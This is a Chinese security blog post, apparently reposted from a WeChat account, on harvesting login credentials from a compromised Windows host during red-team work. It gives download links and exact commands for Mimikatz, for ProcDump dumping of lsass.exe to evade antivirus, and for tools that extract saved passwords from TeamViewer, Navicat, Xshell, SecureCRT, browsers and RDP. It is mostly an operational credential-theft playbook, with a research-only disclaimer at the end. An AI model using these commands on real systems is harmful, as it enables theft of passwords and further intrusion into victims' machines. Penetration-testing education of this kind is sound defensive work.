『红蓝对抗』Windows 下登录凭证获取技巧

admin
admin
admin
139334
文章
114
评论
2021年9月29日23:58:45评论253 views字数 2242阅读7分28秒阅读模式

『红蓝对抗』Windows 下登录凭证获取技巧

文章来源:宸极实验室

0x00 前言

在渗透测试中,当我们拿下一台windows主机后,通常要对主机上的一些密码做信息收集,以便后续渗透使用,本文介绍了几种windows下常见的收集密码的方式。

0x01 windows主机密码抓取

1.1 Mimikatz

windows密码抓取神器,从windows系统进程lsass.exe中抓取明文密码。

•下载地址:
https://github.com/gentilkiwi/Mimikatz
•使用方法:管理员权限运行Mimikatz.exe,执行下面的命令:
privilege::debug   提取权限sekurlsa::logonpasswords   抓取密码

『红蓝对抗』Windows 下登录凭证获取技巧

1.2 ProcDump + Mimikatz

如果主机上装了杀毒软件,开了防火墙,例如:360、火绒之类的话。Mimikatz就会被检测为病毒,无法使用。

由于Mimikatz是从lsass.exe中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用ProcDump工具将系统的lsass.exe进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz进行读取。

ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。

•下载地址:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/ProcDump
•使用方法:
# 将工具拷贝到目标机器上执行如下命令(需要管理员权限)ProcDump.exe -accepteula -ma lsass.exe lsass.dmp
Mimikatz# sekurlsa::minidump lsass.dmp
Mimikatz# sekurlsa::logonPasswords full

『红蓝对抗』Windows 下登录凭证获取技巧

1.3 PwDump7

『红蓝对抗』Windows 下登录凭证获取技巧

使用该工具获取hash值之后,可到cmd5.com进行解密。

『红蓝对抗』Windows 下登录凭证获取技巧

1.4 Getpass

•下载地址:
https://raw.githubusercontent.com/k8gege/K8tools/master/GetPassword_x64.rar

『红蓝对抗』Windows 下登录凭证获取技巧

0x02 第三方运维工具密码抓取

2.1 TeamViewer

•下载地址:

https://github.com/uknowsec/SharpDecryptPwd/raw/master/SharpDecryptPwd.exe

•使用方法:

SharpDecryptPwd.exe -TeamViewer

『红蓝对抗』Windows 下登录凭证获取技巧

2.2 Navicat

•下载地址:

https://github.com/uknowsec/SharpDecryptPwd/raw/master/SharpDecryptPwd.exe
•使用方法:
SharpDecryptPwd.exe -NavicatCrypto

『红蓝对抗』Windows 下登录凭证获取技巧

2.3 xshell

•下载地址:

https://github.com/uknowsec/SharpDecryptPwd/raw/master/SharpDecryptPwd.exe

•使用方法:

先执行 `whoami /user` 将用户名和sid保存下来,然后再使用下面的命令:SharpDecryptPwd.exe -Xmangager -p SessionPath -s username+sid

『红蓝对抗』Windows 下登录凭证获取技巧

2.4 securecrt

•下载地址:

https://github.com/hustlibraco/Moye/blob/master/SecureCRTDecrypt.py

•使用方法:

解密secureCRT保存的密码1. 找到密码保存位置,每台服务器一个ini文件,windows系统位于* 用户名AppDataRoamingVanDykeConfigSessions    (安装版)*SecureCRTSecureFX_hh_x86_7.0.0.326DataSettingsConfigSessions  (绿色移动版)2. 执行脚本,python SecureCRTDecrypt.py [filename...]

『红蓝对抗』Windows 下登录凭证获取技巧

0x03 浏览器密码抓取

3.1 LaZagne

•下载地址:

https://github.com/ethicalhackeragnidhra/LaZagne/archive/2.3.1.zip

•使用方法:

laZagne.exe browsers

『红蓝对抗』Windows 下登录凭证获取技巧

3.2 BrowserPasswordDump

• 下载地址:

https://files1.majorgeeks.com/020c4877362530fccadf006a858f56ee9637177d/covertops/BrowserPasswordDump.zip

• 使用方法:

点击setup安装完成以后,即可提取出单文件来运行使用。
『红蓝对抗』Windows 下登录凭证获取技巧


0x04 远程桌面连接密码抓取

4.1 netpass

•下载地址:

https://www.nirsoft.net/toolsdownload/netpass-x64.zip

•使用说明:

使用管理员权限运行即可

『红蓝对抗』Windows 下登录凭证获取技巧

0x05 总结

1、上述描述的抓取密码的方式,大部分需使用管理员权限才能抓取。

2、windows密码仅在win2008及以下可使用,win10server2012及以上默认不保存明文密码,无法使用工具抓取。

『红蓝对抗』Windows 下登录凭证获取技巧


推荐文章++++

『红蓝对抗』Windows 下登录凭证获取技巧

*史上信息量最大数据库在线曝光:14亿登陆凭证泄露

*『红蓝对抗』利用蜜罐获取攻击者微信ID及手机号

*红蓝对抗钓鱼篇之从入门到放弃


『红蓝对抗』Windows 下登录凭证获取技巧

『红蓝对抗』Windows 下登录凭证获取技巧

本文始发于微信公众号(黑白之道):『红蓝对抗』Windows 下登录凭证获取技巧

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月29日23:58:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   『红蓝对抗』Windows 下登录凭证获取技巧https://cn-sec.com/archives/385921.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息